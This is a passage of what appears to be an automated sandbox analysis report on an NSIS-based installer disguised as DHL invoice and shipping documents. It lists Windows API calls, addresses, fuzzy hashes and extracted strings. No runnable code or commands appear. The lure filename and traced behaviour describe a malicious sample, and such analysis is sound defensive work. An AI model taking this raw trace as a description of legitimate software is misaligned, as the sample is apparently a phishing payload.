                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                            • API String ID: 1975747703-2904746566
                                            • Opcode ID: cb143dc0267d759a9cea0cd43f37dda2b3b0fb558001b9f08e92126bf8417459
                                            • Instruction ID: 062707365540321fd28ddc31094d52b8ee002564e62880c3064c6a51a35bf8f0
                                            • Opcode Fuzzy Hash: cb143dc0267d759a9cea0cd43f37dda2b3b0fb558001b9f08e92126bf8417459
                                            • Instruction Fuzzy Hash: 1A61B4706442006EE620BF629D46F273ABCEB44B49F44443FF945B62E2DB7D99068A3D
                                            APIs
                                            • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 00404523
                                            • GetDlgItem.USER32(00000000,000003E8), ref: 00404537
                                            • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 00404555
                                            • GetSysColor.USER32(?), ref: 00404566
                                            • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404575
                                            • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404584
                                            • lstrlenA.KERNEL32(?), ref: 00404587
                                            • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404596
                                            • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 004045AB
                                            • GetDlgItem.USER32(?,0000040A), ref: 0040460D
                                            • SendMessageA.USER32(00000000), ref: 00404610
                                            • GetDlgItem.USER32(?,000003E8), ref: 0040463B
                                            • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 0040467B
                                            • LoadCursorA.USER32(00000000,00007F02), ref: 0040468A
                                            • SetCursor.USER32(00000000), ref: 00404693
                                            • LoadCursorA.USER32(00000000,00007F00), ref: 004046A9
                                            • SetCursor.USER32(00000000), ref: 004046AC
                                            • SendMessageA.USER32(00000111,00000001,00000000), ref: 004046D8
                                            • SendMessageA.USER32(?,00000000,00000000), ref: 004046EC
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                            • String ID: N$cD@
                                            • API String ID: 3103080414-2800326580
                                            • Opcode ID: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                            • Instruction ID: 43684ccacc2d8fb7b4e0a1eb44f66cc69a0b9750f41782283b4d1566cbdab7d9
                                            • Opcode Fuzzy Hash: 0d552c78708d8b6c3e6a9e133e2a55d80eb6ec1b6100387134d0e82e0d806a6f
                                            • Instruction Fuzzy Hash: 106193B1A00209BBDB109F61DD45F6A3BA9FB84754F10443AFB057B1D1C7B8A951CF98
                                            APIs
                                            • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                            • BeginPaint.USER32(?,?), ref: 00401047
                                            • GetClientRect.USER32(?,?), ref: 0040105B
                                            • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                            • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                            • DeleteObject.GDI32(?), ref: 004010ED
                                            • CreateFontIndirectA.GDI32(?), ref: 00401105
                                            • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                            • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                            • SelectObject.GDI32(00000000,?), ref: 00401140
                                            • DrawTextA.USER32(00000000,0042E820,000000FF,00000010,00000820), ref: 00401156
                                            • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                            • DeleteObject.GDI32(?), ref: 00401165
                                            • EndPaint.USER32(?,?), ref: 0040116E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                            • String ID: F
                                            • API String ID: 941294808-1304234792
                                            • Opcode ID: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                            • Instruction ID: 3ddd31971ff36fa992edb7b0d2f538087f25d398410520a6441e316a3758f4e4
                                            • Opcode Fuzzy Hash: 036095489b744d328a0284f3af7f80ab3f3a11b0609df675fc3b160fbcb80c66
                                            • Instruction Fuzzy Hash: 2E419C71800209AFCB059F95CE459BFBBB9FF44314F00842EF591AA1A0CB349955DFA4
                                            APIs
                                            • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,00000000,00406087,?,?), ref: 00405F27
                                            • GetShortPathNameA.KERNEL32(?,0042C218,00000400), ref: 00405F30
                                              • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405D95
                                              • Part of subcall function 00405D85: lstrlenA.KERNEL32(00000000,?,00000000,00405FE0,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405DC7
                                            • GetShortPathNameA.KERNEL32(?,0042C618,00000400), ref: 00405F4D
                                            • wsprintfA.USER32 ref: 00405F6B
                                            • GetFileSize.KERNEL32(00000000,00000000,0042C618,C0000000,?,0042C618,?,?,?,?,?), ref: 00405FA6
                                            • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 00405FB5
                                            • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FED
                                            • SetFilePointer.KERNEL32(0040A3D0,00000000,00000000,00000000,00000000,0042BE18,00000000,-0000000A,0040A3D0,00000000,[Rename],00000000,00000000,00000000), ref: 00406043
                                            • GlobalFree.KERNEL32(00000000), ref: 00406054
                                            • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0040605B
                                              • Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,?,0000000A,?), ref: 00405E24
                                              • Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,?,0000000A,?), ref: 00405E46
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                            • String ID: %s=%s$[Rename]
                                            • API String ID: 2171350718-1727408572
                                            • Opcode ID: 7fab33d9305e3d35eb4d6262b18c9d607ce8d1b4ed31532576ac5101631bdde8
                                            • Instruction ID: da8ce3bfdf00fcfed17b5edaf8d9799a0bf0ff3a482d4f6cc2fc7d52a36fe9c3
                                            • Opcode Fuzzy Hash: 7fab33d9305e3d35eb4d6262b18c9d607ce8d1b4ed31532576ac5101631bdde8
                                            • Instruction Fuzzy Hash: 3D3135312407117BC220AB65AC88F6B3A5CDF41758F16003BFA02F72D2DE7C98558ABD
                                            APIs
                                            • GetDlgItem.USER32(?,000003FB), ref: 0040480E
                                            • SetWindowTextA.USER32(00000000,?), ref: 00404838
                                            • SHBrowseForFolderA.SHELL32(?,00429860,?), ref: 004048E9
                                            • CoTaskMemFree.OLE32(00000000), ref: 004048F4
                                            • lstrcmpiA.KERNEL32(0042DFC0,0042A488), ref: 00404926
                                            • lstrcatA.KERNEL32(?,0042DFC0), ref: 00404932
                                            • SetDlgItemTextA.USER32(?,000003FB,?), ref: 00404944
                                              • Part of subcall function 00405987: GetDlgItemTextA.USER32(?,?,00000400,0040497B), ref: 0040599A
                                              • Part of subcall function 00406587: CharNextA.USER32(?,*?|<>/":,00000000,?,767D3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,?,0000000A,?), ref: 004065DF
                                              • Part of subcall function 00406587: CharNextA.USER32(?,?,?,00000000,?,767D3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,?,0000000A,?), ref: 004065EC
                                              • Part of subcall function 00406587: CharNextA.USER32(?,?,767D3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,?,0000000A,?), ref: 004065F1
                                              • Part of subcall function 00406587: CharPrevA.USER32(?,?,767D3410,00436400,00435000,004033B3,00436400,00436400,004036B5,?,?,0000000A,?), ref: 00406601
                                            • GetDiskFreeSpaceA.KERNEL32(00429458,?,?,0000040F,?,00429458,00429458,?,00000001,00429458,?,?,000003FB,?), ref: 00404A02
                                            • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A1D
                                              • Part of subcall function 00404B76: lstrlenA.KERNEL32(0042A488,0042A488,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,00404A91,000000DF,00000000,00000400,?), ref: 00404C14
                                              • Part of subcall function 00404B76: wsprintfA.USER32 ref: 00404C1C
                                              • Part of subcall function 00404B76: SetDlgItemTextA.USER32(?,0042A488), ref: 00404C2F
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                            • String ID: A
                                            • API String ID: 2624150263-3554254475
                                            • Opcode ID: 65010f81d111a107078dfd81cf5a0743528becb2b33aaf5c40ee420fb77efb02
                                            • Instruction ID: f53f9ae5ebeaccab956e1b2ad526c51027fc30446c854342799b5ba7b8d0bc76
                                            • Opcode Fuzzy Hash: 65010f81d111a107078dfd81cf5a0743528becb2b33aaf5c40ee420fb77efb02
                                            • Instruction Fuzzy Hash: BAA172F1A00209ABDB11AFA5CD45AAF76B8EF84314F14807BF611B62D1D77C89418F6D
                                            APIs
                                            • GetTickCount.KERNEL32 ref: 00402F42
                                            • GetModuleFileNameA.KERNEL32(00000000,00436C00,00000400,?,?,00403722,?,?,?,0000000A,?), ref: 00402F5E
                                              • Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,?,0000000A,?), ref: 00405E24
                                              • Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,?,0000000A,?), ref: 00405E46
                                            • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,00435C00,00435C00,00436C00,00436C00,80000000,00000003,?,?,00403722,?,?,?), ref: 00402FAA
                                            • GlobalAlloc.KERNEL32(?,?,?,?,00403722,?,?,?,0000000A,?), ref: 004030E0
                                            Strings
                                            • Null, xrefs: 00403028
                                            • 8TA, xrefs: 00402FBF
                                            • Error launching installer, xrefs: 00402F81
                                            • Inst, xrefs: 00403016
                                            • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00403107
                                            • soft, xrefs: 0040301F
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                            • String ID: 8TA$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                            • API String ID: 2803837635-1977864323
                                            • Opcode ID: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                            • Instruction ID: 36ae42bb95036f4d014ef15fc9cddc9856debb4c315f30e11e88dada5eb0dcac
                                            • Opcode Fuzzy Hash: 0471a428ad8d14c201eb1a2d05761fa305cb24827ec1de9291aed20d949dc82a
                                            • Instruction Fuzzy Hash: 6C510531A01214ABDB209F64DE85B9E7EBCEB0435AF60403BF504B62D2C77C9E418B6D
                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(0042DFC0,00000400), ref: 00406452
                                            • GetWindowsDirectoryA.KERNEL32(0042DFC0,00000400,?,00429C68,00000000,00405409,00429C68,00000000,00000000), ref: 00406468
                                            • SHGetPathFromIDListA.SHELL32(00000000,0042DFC0,?,00405409,00000007,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064C7
                                            • CoTaskMemFree.OLE32(00000000,?,00405409,00000007,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064D0
                                            • lstrcatA.KERNEL32(0042DFC0,\Microsoft\Internet Explorer\Quick Launch,?,00429C68,00000000,00405409,00429C68,00000000), ref: 004064F4
                                            • lstrlenA.KERNEL32(0042DFC0,?,00429C68,00000000,00405409,00429C68,00000000,00000000,?,767D23A0), ref: 00406546
                                            Strings
                                            • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004064EE
                                            • Software\Microsoft\Windows\CurrentVersion, xrefs: 00406423
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Directory$FreeFromListPathSystemTaskWindowslstrcatlstrlen
                                            • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                            • API String ID: 4024019347-730719616
                                            • Opcode ID: 4f035e6071b976de3853a8921acfec8e3f6599c5ec55354fa89b4c1c1d35bef3
                                            • Instruction ID: dd0baf6a3bef4ec2da884e75bd50347be15db8678cbe9dcd308fcfbafd937b9a
                                            • Opcode Fuzzy Hash: 4f035e6071b976de3853a8921acfec8e3f6599c5ec55354fa89b4c1c1d35bef3
                                            • Instruction Fuzzy Hash: 1361F371900210AADB219F24DD85B7E7BA4AB05714F12813FF807B62C1C67D8966DB9D
                                            APIs
                                            • GetWindowLongA.USER32(?,000000EB), ref: 004043B1
                                            • GetSysColor.USER32(00000000), ref: 004043EF
                                            • SetTextColor.GDI32(?,00000000), ref: 004043FB
                                            • SetBkMode.GDI32(?,?), ref: 00404407
                                            • GetSysColor.USER32(?), ref: 0040441A
                                            • SetBkColor.GDI32(?,?), ref: 0040442A
                                            • DeleteObject.GDI32(?), ref: 00404444
                                            • CreateBrushIndirect.GDI32(?), ref: 0040444E
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                            • String ID:
                                            • API String ID: 2320649405-0
                                            • Opcode ID: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                            • Instruction ID: 0cb6da092899fbd89936ee00678fc1211e2f1892718b1dfe439ae8b372ce6297
                                            • Opcode Fuzzy Hash: 8c62cc7b680d0f9fb00056791eeffc6cd2931fdceedc16941688e7b217811201
                                            • Instruction Fuzzy Hash: E32177715007049BCF309F78D948B577BF8AF81714B04893DEAA6B26E1C734E948CB58
                                            APIs
                                            • lstrlenA.KERNEL32(00429C68,00000000,?,767D23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000,?), ref: 0040540A
                                            • lstrlenA.KERNEL32(004032C3,00429C68,00000000,?,767D23A0,?,?,?,?,?,?,?,?,?,004032C3,00000000), ref: 0040541A
                                            • lstrcatA.KERNEL32(00429C68,004032C3,004032C3,00429C68,00000000,?,767D23A0), ref: 0040542D
                                            • SetWindowTextA.USER32(00429C68,00429C68), ref: 0040543F
                                            • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405465
                                            • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040547F
                                            • SendMessageA.USER32(?,00001013,?,00000000), ref: 0040548D
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                            • String ID:
                                            • API String ID: 2531174081-0
                                            • Opcode ID: 8f7b4f01caaf6d1e12ead9ba64632b4b1eb20c2348e45d3c9541951699492127
                                            • Instruction ID: 7fccb86dafa480228006d80d04b82b7e1b017f67e9930a1aa42837d262fd4390
                                            • Opcode Fuzzy Hash: 8f7b4f01caaf6d1e12ead9ba64632b4b1eb20c2348e45d3c9541951699492127
                                            • Instruction Fuzzy Hash: 81218971900118BBDF11AFA5CD85ADEBFA9EB05354F14807AF944B6291C6788E81CFA8
                                            APIs
                                            • SendMessageA.USER32(?,0000110A,00000009,00000000), ref: 00404C9B
                                            • GetMessagePos.USER32 ref: 00404CA3
                                            • ScreenToClient.USER32(?,?), ref: 00404CBD
                                            • SendMessageA.USER32(?,00001111,00000000,?), ref: 00404CCF
                                            • SendMessageA.USER32(?,0000110C,00000000,?), ref: 00404CF5
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Message$Send$ClientScreen
                                            • String ID: f
                                            • API String ID: 41195575-1993550816
                                            • Opcode ID: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                            • Instruction ID: 8ac1eb656b69e247d5f05692bef4687e0c0d70a1275d834663b2b8f38aac2a1a
                                            • Opcode Fuzzy Hash: fbe7a9a9d251da3c9c448e6b1369ef84c2200939816a620fb3ee489aa4668e2c
                                            • Instruction Fuzzy Hash: B6019E71900218BAEB00DB94DD81FFFBBBCAF44711F10012BBA01B61C0C7B899418BA4
                                            APIs
                                            • SetTimer.USER32(?,00000001,000000FA,00000000), ref: 00402E65
                                            • MulDiv.KERNEL32(?,?,?), ref: 00402E90
                                            • wsprintfA.USER32 ref: 00402EA0
                                            • SetWindowTextA.USER32(?,?), ref: 00402EB0
                                            • SetDlgItemTextA.USER32(?,00000406,?), ref: 00402EC2
                                            Strings
                                            • verifying installer: %d%%, xrefs: 00402E9A
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: Text$ItemTimerWindowwsprintf
                                            • String ID: verifying installer: %d%%
                                            • API String ID: 1451636040-82062127
                                            • Opcode ID: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                            • Instruction ID: 08bf30aeaad7c3c0f985f8b81484beb4ade113f1463dbf8d033ac048ea6a4a00
                                            • Opcode Fuzzy Hash: 008e47a76e30b834da19422bd6ea308201e4826492d01be12a9765c28616dd6c
                                            • Instruction Fuzzy Hash: EF016270640208FBEF209F60DE09EEE3769AB10304F008039FA06B51E1DBB89D56CF99
                                            APIs
                                            • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040665E
                                            • wsprintfA.USER32 ref: 00406697
                                            • LoadLibraryExA.KERNEL32(?,00000000,?), ref: 004066AB
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: DirectoryLibraryLoadSystemwsprintf
                                            • String ID: %s%s.dll$UXTHEME$\
                                            • API String ID: 2200240437-4240819195
                                            • Opcode ID: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                            • Instruction ID: e759eb08ac56218b9122c2e4f19d02add1096545fd4a6e696b7e3c492baae584
                                            • Opcode Fuzzy Hash: bb0c7447bffed25a47ff2517fd87417c43c35d72d0d658bdc18f354cf5cb2530
                                            • Instruction Fuzzy Hash: 74F0FC305002096BDF149B74DD0DFEB365CAF08704F14097AA586E10D1E9B9D4758B69
                                            APIs
                                              • Part of subcall function 00405E20: GetFileAttributesA.KERNEL32(00000003,00402F71,00436C00,80000000,00000003,?,?,00403722,?,?,?,0000000A,?), ref: 00405E24
                                              • Part of subcall function 00405E20: CreateFileA.KERNEL32(?,?,00000001,00000000,?,00000001,00000000,?,?,00403722,?,?,?,0000000A,?), ref: 00405E46
                                            • GlobalAlloc.KERNEL32(?,?), ref: 0040286E
                                              • Part of subcall function 00403390: SetFilePointer.KERNEL32(00000000,00000000,00000000,004030F6,?,?,?,00403722,?,?,?,0000000A,?), ref: 0040339E
                                            • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 0040288A
                                            • GlobalFree.KERNEL32(?), ref: 004028C9
                                            • GlobalFree.KERNEL32(00000000), ref: 004028DC
                                              • Part of subcall function 00403168: GetTickCount.KERNEL32 ref: 004031CF
                                              • Part of subcall function 00403168: GetTickCount.KERNEL32 ref: 00403276
                                              • Part of subcall function 00403168: MulDiv.KERNEL32(7FFFFFFF,?,?), ref: 0040329F
                                              • Part of subcall function 00403168: wsprintfA.USER32 ref: 004032AF
                                            • CloseHandle.KERNEL32(?,?,?), ref: 004028F8
                                            • DeleteFileA.KERNEL32(?), ref: 0040290B
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321317127.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321380079.0000000000443000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_9_2_400000_DHL AWB - INVOICE & SHIPPING DOCUMENTS.jbxd
                                            Similarity
                                            • API ID: FileGlobal$AllocCountFreeTick$AttributesCloseCreateDeleteHandlePointerwsprintf
                                            • String ID:
                                            • API String ID: 2082585436-0
                                            • Opcode ID: d0d00f1725f2f14de433ed75159567167b1eaffcb45366960556dd008663894d
                                            • Instruction ID: ef30041e15382934485b3a1dbcd939e881a8f40863dcc9ce189fd72ebc1ad175
                                            • Opcode Fuzzy Hash: d0d00f1725f2f14de433ed75159567167b1eaffcb45366960556dd008663894d
                                            • Instruction Fuzzy Hash: B8213972C00128BBDF216FA5DD8899EBE79BF04364F10823AF554B62E0CB7949419F68
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000009.00000002.6321129996.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                            • Associated: 00000009.00000002.6321033280.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                            • Associated: 00000009.00000002.6321220783.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
